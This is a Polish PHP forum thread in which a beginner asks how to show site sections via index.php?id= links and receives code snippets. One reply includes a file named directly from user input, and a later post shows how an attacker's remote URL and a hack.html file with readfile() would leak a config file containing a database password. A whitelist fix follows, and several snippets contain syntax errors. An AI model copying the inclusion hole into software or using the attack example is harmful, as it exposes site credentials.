Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Include - Linki
Forum PHP.pl > Forum > PHP
E-Kukis
Mam wielki problem! Robie strone o grze i chce zastosować linki index.php?id=test no i zrobiłem tam gdzie się ma wyświetlać zawartość działu czyli pośrodku kod php wstawiłem

1. <?
  2. if($_GET['id']=="test"){
  3. include("test.php");
  4. }
  5.  
  6. include("news/show_news.php");
  7.  
  8. ?>

To include show_news.php to żeby na stronie głównej się newsy wyświetlały. No i jak wchodze w link index.php?id=test to otwiera mi się zawartość działu test nad newsami mad.gif . Ja chce żeby jak wejde w link ndex.php?id=test otwierał się on ale żeby newsy znikały. Żeby był sam dział test.

Tutaj macie strone www.simsportal.yoyo.pl na yoyo bo narazie w budowie. No i wejdźcie w dział kontakt. I tam wlasnie jest link ndex.php?id=test w kontakt i zobaczcie jak to działa..

Jak zrobić żeby sie newsy nie pokazywały w linku ndex.php?id=test. I jeszcze co zrobić że jak wejde w link np index.php?id=bleble to żeby sie wyświetlało że błąd wyskoczyl ze nie ma takiego pliku. CHodzi mi oto żeby w środku dział się wyświetlał że nie ma takiego pliku.
Moli
  1. <?php
  2. if ( $_GET['id'] == 'test' ) include 'test.php' ;
  3. else include 'news/show_news.php' ;
  4. ?>

lub
  1. <?php
  2. if ( empty( $_GET['id'] ) ) include 'news/show_news.php' ;
  3. else if ( $_GET['id'] == 'test' ) include 'test.php' ;
  4. else echo 'Brak takiego dzialu';
  5. ?>
E-Kukis
Ale ten kod co dałeś pokaże że jak tego pliku nie ma otworzy show_news.php?

Ohhh działa!! Dzięki!! A jeszcze powie mi ktoś jak zrobić że jak nie ma takiego pliku utworzy sie np. blad.php??
cicik
Hmm. To ja może polecę taka stronę: www.php.net . Szczególnie polecam dział documentation. Myślę, że sporo rzeczy się wyjaśni.
E-Kukis
Niestety nic z tej strony nie kapuje. Teraz próboje dać taki kod żeby zrobić kilka linków np test.php forum.php itp. No i żeby tylko na stronie głównej się newsy wyświetlały. Tak jak wcześniej. I chce dać taki kod:

1. <?php
  2. if($_GET['id']=="test"){
  3. include("test.php");
  4. else include 'news/show_news.php' ;
  5. }
  6. if($_GET['id']=="forum"){
  7. include("forum.php");
  8. else include 'news/show_news.php' ;
  9. }
  10.  
  11. ?>

I wywala błędy. Co zrobić?
thornag
Przede wszystkim przeczytac jakis kurs PHP dla poczatkujacych, napewno wyjasni to wiecej niz propozycja cicika smile.gif.

Co do kodu to jak przeczytasz kurs to na pewno stanie sie jasne co i jak.

1. <?php
  2. if(isset($_GET['id'])) {
  3. switch($_GET['if']) {
  4.  case 'forum':
  5. include 'forum.php';
  6. break;
  7.  case 'download':
  8. ... etc ...
  9.  
  10.  default:
  11. include 'blad.php';
  12. }
  13. } else {
  14.  include 'news.php';
  15. }
  16. ?>
cicik
Cytat(E-Kukis @ 18.06.2007, 11:57:30 ) *
Niestety nic z tej strony nie kapuje.

Niestety żeby zacząć pisać jakieś programy najpierw trzeba troszkę poczytać. Faktycznie może jakiś kurs dla początkujących będzie lepszy na początek.
SunSet
robidz 1 plik *.php (najlepiej index.php) z cala szata graficzna itp. tam gdzie ma byc tresc dajesz:

1. <?php
  2.  
  3.  if (isset($_GET['id'])) $id=$_GET['id'];
  4. else $id='';
  5.  
  6.  if (file_exists($id.'.html') include($id.'.html');
  7. else include('main.html');
  8.  
  9. ?>

skrypt dziala tak robisz pliki html (lub php wtedy html zamieniasz na php) dajesz w nim jaks tresc np. robisz plik lalala.html i wpisujesz w nim lalalala... robisz link:

1. <a href=index.php?id=lalala'>lalal</a>

i jak go klinkniesz to w miejscu tamtego skryptu bedzie text lalalal... bo taka jest zawartosc pliku lalala.html winksmiley.jpg

plik main.html to jest domyslny plik jako jego zawartosc daj newsy winksmiley.jpg

posta pisalem na szybko wiec moga byc bledy ortograficzne i logiczne za ktore przepraszam winksmiley.jpg
cicik
I jeszcze umieść na serwerze plik konfiguracyjny z hasłem do bazy danych. Nazwij go np. konfig.xml.
Wtedy ja otworzę u Ciebie stronę index.php?id=http://www.php-art.pl/hack

I na serwerze www.php-art.pl umieszcze plik hack.html o treści:

<?php
readfile('konfig.xml');
?>

Jak myślisz, co się pokaże?

Co prawda Twój serwer musi być odpowiednio skonfigurowany żeby to działało ale przy domyslnej konfiguracji tak właśnie jest.
SunSet
wyszedlem z zalozenie ze nie trzyma zadnych tajnych plikow winksmiley.jpg

teraz nie mam juz dostepu do kompa ale jak wroce napisze jak mozna zabezpieczyc ten plik winksmiley.jpg
zrobie to za jakies 3-4h winksmiley.jpg

---edit---

troche z opoznieniem ale winksmiley.jpg

1. <?php
  2.  
  3.  $strony=array('main','news','cos','cos2',itd...);
  4.  
  5.  if (isset($_GET['id'])) $id=$_GET['id'];
  6. else $id='';
  7.  if (!in_array($id,$strony)) $id=$strony[0];
  8.  
  9.  if (file_exists($id.'.html') include($id.'.html');
  10. else include('main.html')
  11.  
  12. ?>

znowu moze byc blad ale imo to juz jest swego rodzaju zabezpieczenie winksmiley.jpg ale moge sie mylic gdyz ciagle sie ucze winksmiley.jpg
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.